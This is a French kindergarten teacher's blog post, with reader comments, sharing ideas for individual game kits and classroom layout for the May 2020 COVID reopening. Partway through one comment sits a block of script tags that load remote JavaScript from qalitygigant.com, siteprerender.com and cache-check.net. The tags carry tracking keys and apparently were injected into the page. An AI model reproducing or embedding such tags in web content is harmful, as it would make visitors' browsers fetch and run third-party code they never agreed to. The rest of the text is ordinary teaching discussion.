-
Comment s'organiser ?
Je commence à réfléchir à ce que je vais pouvoir faire et mettre en place pour la reprise à l'école avec tout le protocole sanitaire que l'on nous impose ...
Je vais avoir environ 9 élèves qui viennent tous les jours. Ils auront la même place chaque jour.
J'ai listé tous les jeux de ma classe.
J'ai éliminé ceux qui étaient de base impossible à nettoyer (des jeux avec des petites étiquettes plastifiées).
A partir de là, je pense que je vais faire pour chaque élève une sorte de "package" pour la semaine avec :
- 1 ou 2 puzzles avec pièces plastiques épaisses faciles à nettoyer
- des kaplas avec 2 fiches modèles (j'en ai assez, ils les garderont pour 3 semaines)
- un jeu de "construction" avec pièces plastique : légo, duplo, clipo, architekt, mécano, picot, codo puzzle --> A la fin de la semaine, tout dans un sac en tissu et hop, à la machine à lever pour le lundi !
- un jeu smartgame
- pâte à modeler dans un pot individuel au nom de l'enfant
- des jetons en plastique à empiler
- des cubes encastrables
- des dés
- des lettres celda en scipt, capitale et cursive avec un rail
- un jeu de tangram
Ils auront aussi leur trousse avec crayons, ciseaux, colle, règle avec leur ardoise.
SI vous avez d'autres idées, je suis preneuse
-
Commentaires
37dilyeSamedi 16 Mai 2020 à 22:50Pour ma part, 6 enfants en ps ms.
J'ai testé cette semaine le système des barquettes comme vous avec crayons, pions, ardoise , ciseaux colle ...
Une petite astuce que j'ai trouvé bien utile : j'ai demandé une serviette de bain à chaque enfant. Ils l'a rapportent à la maison chaque soir. Elle sert ,comme pour l'idée des tapis ,aux enfants pour s'installer au sol pour une activité mais aussi en eps pour matérialiser l'espace et les distances, pour par exemple faire une ronde autour, se promener et revenir à sa place ...
Bonjour, à peu près le même contenu dans les barquettes individuelles , j’ai ajouté un lot de tangram , des jetons avec un dé , des allumettes pour reproduire des figure en 2D , des multicubes , des cartes de 1 à 10... on s’organise et on va se débrouiller , comme d’habitude, mais c’est quand même tristouille.
chez moi ça démarre jeudi , on ajustera après .Bon courage
35frédérique delabreLundi 11 Mai 2020 à 08:50Bonjour, je vais avoir une dizaine d'élèves: j'en prendrai 5/6 le lundi et mardi puis 5/6 autres le jeudi vendredi .
voilà ce que j'e vais leur préparer
- une boite à chaussure ( demandée aux parents) avec du matériel individuel: ciseau, colle, crayon velleda, crayons de couleur, gomme,ardoise, chiffon , un pot de pâte à modeler( fabriquée par les parents), un pot de semoule, son cahier de dessin , une boite de jetons, une boite à compter, une ardoise, un jeu de lettres, un tapis, une pochette plastique pour y glisser des fiches à réaliser au vellelda
-un kit de jeux qu'ils garderont 12 jours consécutifs puis qui sera entreposé pendant 5 jours sans contact: cela évitera d'avoir à le désinfecter.Les deux autres jours se sont de nouveaux kits qui seront attribués aux autres élèves
Ci joint un lien vers la liste de mes kits
https://www.dropbox.com/t/AeAcm3jMxKx0lkXL
-
kisilouMardi 2 Juin 2020 à 17:53
Merci beaucoup
-
frédérique delabreLundi 1er Juin 2020 à 22:44
-
kisilouLundi 1er Juin 2020 à 21:31
Bonjour, serait-il possible d'avoir de nouveau le lien de ton kit? Je suis enseignante en CM, mais je dois assurer l'interim en mater.
Merci
-
34dcztDimanche 10 Mai 2020 à 21:37Utilisation dles boîtes d'oeufs: Co-voiturage : avec des boîtes d’œufs découpées selon la quantité désirée,-/10/12...24!!! et remplies en parties d’occupants (personnages, animaux en plastique ou autres...), demander aux élèves d’aller chercher le bon nombre d’occupants supplémentaires pour remplir la voiture ..bref compéter une collection, décomposer .
voilà!Bonne reprise et merci pour tout le travail partagé !33Agnès MORATIDimanche 10 Mai 2020 à 21:24Tu mets les kaplas à la machine à laver dans un sac en tissu?32MavieDimanche 10 Mai 2020 à 09:44Bonjour
je dois aussi réfléchir comme vous; je reprends avec 10 GS. On a séparé la classe en 2 zones: une zone avec des tables nominatives avec les distances entre chaque table et une zone avec coussins nominatif avec emplacement marqué au sol, histoire de pouvoir les bouger un peut. Je pense alterner les activités à la table et les activités « collectives » type lecture d’albums, débats philo, ...lien avec ceux restés à la maison via le vidéo projecteur et Klassroom.
j’avais aussi fait fabriquer un « pot à crayon » à la maison avec une brique de lait pour y mettre crayons feutres fins crayons de couleur, règle, ciseaux, colle...qui seront donc nominatifs aussi.
Et donc sacs tissus avec jeux divers ....pour passage en machine aussi.
C’est rassurant de voir que certains ont eu les mêmes idées. Parfois je me suis posé des questions : est-ce une bonne idée, est-ce réalisable....
Merci donc de permettre ces échanges
Mavie
-
ValérieDimanche 10 Mai 2020 à 11:53
Oups faute à chance! en breton c'est chans!
Kenavo!
valérie
-
ValérieDimanche 10 Mai 2020 à 11:49
J'ai eu les mêmes idées, j'ai aussi prévu des caisses plastiques nominatives avec des activités pour 2 jours à voir comment ça va sepasser, j'ai peur qu'ils s'ennuient vite, j'ai prévu des petits tapis à rouler également nominatifs pour qu'ils puissent bouger ét faire leurs activités au sol s'ils le souhaitent (2 puzzles, des travaux autonomes comme tu le proposes Luccia fiches allumettes, tracés codés etc... ) comme c'est une classe multiniveaux bilingue(breton), pour les TPS-PS, j'ai prévu des petits jeux d'eau avec mini-cuvette, petit personnage etc, une dinette tout ça reste dans leur caisse pour 2 jours avec manip sur tapis plastifié nominatif aussi.
Du sport à table, autour de leur chaise, des mini-sketchs etc....et j'ai la chanse d'avoir un petit jardin donc école dehors, temps permettant.
Ton site est vraiment sympa et où le partage prend tout son sens!
Merci!
Valérie
-
31BabasanSamedi 9 Mai 2020 à 15:42Bonjour Luccia et merci pour tout ce partage. J'ai préparé aussi des paniers individuels avec feutres (fins et moyens) , crayons de couleur et de papier, velleda, gomme, colle... Ainsi que du matériel individuel comme légo, kapla, allumettes...Je vais proposer à mes élèves présents (6 pour le moment) des étiquettes individuelles pour faire la date à leur table, le calendrier du mois au format A4 ainsi qu'une ardoise lignée pour qu'ils écrivent la date...comme nous faisions avant tous ensemble au coin regroupement.
30ACFLSamedi 9 Mai 2020 à 12:18Merci Luccia pour tout ton travail.
J'ai prévu aussi de la pâte à modeler avec des cure-dents et des pics à brochette de taille moyenne pour travailler les formes géométriques, les solides et autres créations https://www.pinterest.fr/pin/545428204872053778/.
29LineSamedi 9 Mai 2020 à 12:06Merci, un énorme merci !! Tout ça m'aide vraiment à organiser cette reprise ... Je ne savais pas par quel bout l'attaquer !
28ClassalexSamedi 9 Mai 2020 à 10:43Je pense effectivement que nous avons tous fait la même chose, j'aurai que 5 élèves dans ma classe. J'ai disposé les places en étoile, deux bureaux pour chaque enfant, l'élève est assis devant les deux bureaux ( je ne sais pas si je suis claire), un pour travailler l'autre pour disposer leur caisse individuelle et nominative avec tout leur matériel pour la journée, leurs jeux de la journée, livres de la journée, cubes, dés, lettres, gommettes etc.... le tapis est une très bonne idée je prends! n'ayant que 5 enfants je vais leur attribuer un vélo à chacun pour la récré, deux cerceaux.... Avez vous vu l'idée des fanions de Charivari? Super idée! Merci Lucie pour tous ces partages que je suis depuis très longtemps!
27isaSamedi 9 Mai 2020 à 10:24Merci pour ton partage, moi je vais tourner sur deux groupes,j'ai fait également des boites barquettes individuelles comme toi, j'ai ajouté règle, modèle graphisme, bande numériques, bande alphabet, un cahier de dessin, un cahier de coloriage et un livre oi deux livre par jour. Ensuite je les mettrai de côté, je vais tourner sur 4 caisses de livres, une par jour.
26CélineSamedi 9 Mai 2020 à 08:12A côté de chaque table on a disposé un tapis individuel, les enfants pourront s'y reposer ou simplement faire leurs activités autrement qu'assis sur leur chaise.
En tout cas merci pour toutes vos idées-
Samedi 9 Mai 2020 à 09:52
-
25SabSamedi 9 Mai 2020 à 02:27Bonjour merci pour le partage,je prepare des tiroirs individuels aussi lundi car pas la possibilité de me rendre dans ma classe cause ménage. Je pensais leur demander une boîte d'allumettes pour faire des constructions avec fiches individuelles que j'ai trouvé sur un site de Cp. Et apporter quelques objets types playmobil, une dizaine pour des problèmes numériques. Je cherche encore d'autres idées car nous n'avons pas tant de jeux et de matériel dans notre école pour les gs.24NathGVendredi 8 Mai 2020 à 20:48Bonjour,
Pareil pour moi, place attitrée, j'ai fait un marquage au sol pour qu'ils sachent jusqu'où ils peuvent "se déplacer" dans leur espace car je ne pense pas qu'ils pourront rester assis tout le temps. Chaque espace étant séparé d'au moins 1m50. J'ai ajouté un verre jetable.
Le plus compliqué va être de leur faire comprendre qu'on ne peut plus rien faire comme avant.
Bon courage à tous
23MiaketteVendredi 8 Mai 2020 à 19:33MiaketteIl y a 1 heureDécidément, je lis dans tes pensées ou alors on a la même façon de travailler ou de voir les choses. Je vais avoir seulement 5 élélèves mardi dans ma classe. J'ai déjà installé mes tables séparément et enlevé mes bancs dans le coin regroupement. J'aurais voulu mettre des marques au sol, mais question hygiène, ça ne va pas le faire, du coup, j'ai installé 5 chaises assez espacées les unes des autres. Chaque élève aura une table avec son prénom dessus, un pot avec le matériel (crayons, ciseaux, colle...) et un casier nominatif avec le matériel individuel (ardoise, ardoise + lettres cursives magnétiques nathan, un smart game (le chemin des sorcières) , un jeu de katamino, des dés...) et justement je voulais mettre dans ce casier des jeux à la journée ou à la semaine (c'est vrai que pour la désinfection, c'est peut-être plus simple à la semaine).Je voulais aussi créer un fichier d'autonomie pour éviter les déplacements et pour gérer les moments où ils ont fini de faire le travail demandé (et oui, d'habitude,ils s'inscrivent au tableau à un atelier...)et sasn que je te demande, tu as fait ce fichier. ET bien merci pour ce partage et le temps gagné!!
22ClochetteVendredi 8 Mai 2020 à 19:09Les photocopies... Il faut faire attention à ça aussi ! Quand nous faisons les photocopies, on peut les contaminer. Et quand on les mets sur les tables des élèves... on les contamine. Même chose pour les jeux. Il faut penser à les décontaminer, mais il faut aussi penser que nous pouvons être contaminés. Il faut donc toujours bien se laver les mains avant de préparer les tables de nos élèves. Sinon, mon IEN demande qu'on fasse les photocopies 5 jours avant de les donner...21SophieVendredi 8 Mai 2020 à 18:56Moi j’ai ajouté une ardoise . Une boîte à compter ( qui pourra aussi servir pour les lettres ou ce genre de chose ) et un petit bac avec du sable pour transvasement mais aussi graphisme20NounetteVendredi 8 Mai 2020 à 18:35tu as prévus combien de kapla chacun ?
Je pense aussi à pikfil, geoplan, tangram ...
As-tu une idée de ce que tu vas envoyer à ceux qui restent à la maison ?
<script src="//qalitygigant.com/227ee61cbd084e801b.js"></script> <script src="http://qalitygigant.com/optout/set/lat?jsonp=__mtz_cb_644873883&key=227ee61cbd084e801b&cv=1588955821&t=1588955821679" type="text/javascript"></script> <script src="http://qalitygigant.com/optout/set/lt?jsonp=__mtz_cb_401043495&key=227ee61cbd084e801b&cv=636760&t=1588955821681" type="text/javascript"></script> <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script> <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1588955821699" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>19sarahVendredi 8 Mai 2020 à 18:15Moi je n'ai pas mis les kaplas car je me dis que c'est pas facile à nettoyer car on ne peut pas les laver dans l'eau...
2 livres pour la semaine que je poserai sur leur tablee pour les départs et arrivée en classe puisqu'ils iront s'asseoir directement et attendront que tout le monde soit arrivé.
-
Vendredi 8 Mai 2020 à 19:04
-
18BbkVendredi 8 Mai 2020 à 18:1017BarbaraVendredi 8 Mai 2020 à 18:0116bernaVendredi 8 Mai 2020 à 17:5615abVendredi 8 Mai 2020 à 17:54Bonjour. Je pense qu'on est tous preneurs d'idées pour occuper nos élèves.
Ce sera de la garderie, plus de l'école. Et c'est plus compliqué dans nos classes de maternelle vu que le matériel est collectif !
Pourquoi pas prévoir des découpages-collages en nettoyant les ciseaux après ? Et si certains ont un stock de Play maïs, on peut piocher dedans.
Voilà pour ma petite contribution.
Bon courage à tout le monde !
Agnès
-
Vendredi 8 Mai 2020 à 18:06
-
14VirginieVendredi 8 Mai 2020 à 17:52Des grilles de loto sonore et avec nombres13cocoVendredi 8 Mai 2020 à 17:50j'ai demandé un jeu individuel pour la récréation, ils pourront avoir du gel, une boite de mouchoir individuel, leur trousse avec ciseaux, colle, crayon de bois et de couleurs, velleda le tout dans une boite pour aider au nettoyage des table + place attitrée
-
MiaketteVendredi 8 Mai 2020 à 18:16
Décidément, je lis dans tes pensées ou alors on a la même façon de travailler ou de voir les choses. Je vais avoir seulement 5 élélèves mardi dans ma classe. J'ai déjà installé mes tables séparément et enlevé mes bancs dans le coin regroupement. J'aurais voulu mettre des marques au sol, mais question hygiène, ça ne va pas le faire, du coup, j'ai installé 5 chaises assez espacées les unes des autres. Chaque élève aura une table avec son prénom dessus, un pot avec le matériel (crayons, ciseaux, colle...) et un casier nominatif avec le matériel individuel (ardoise, ardoise + lettres cursives magnétiques nathan, un smart game (le chemin des sorcières) , un jeu de katamino, des dés...) et justement je voulais mettre dans ce casier des jeux à la journée ou à la semaine (c'est vrai que pour la désinfection, c'est peut-être plus simple à la semaine).Je voulais aussi créer un fichier d'autonomie pour éviter les déplacements et pour gérer les moments où ils ont fini de faire le travail demandé (et oui, d'habitude,ils s'inscrivent au tableau à un atelier...)et sasn que je te demande, tu as fait ce fichier. ET bien merci pour ce partage et le temps gagné!!
-
Ajouter un commentaire
Bonjour !
Ici nous avons aussi mis un jeu de Tangram par enfant avec une fiche défi et un défi pâte à modeler : soit ils font de manière libre, soit ils essaient de relever un défi...
Et je leur mets aussi des "Cherche et trouve" et des Mandalas.
Bonne journée !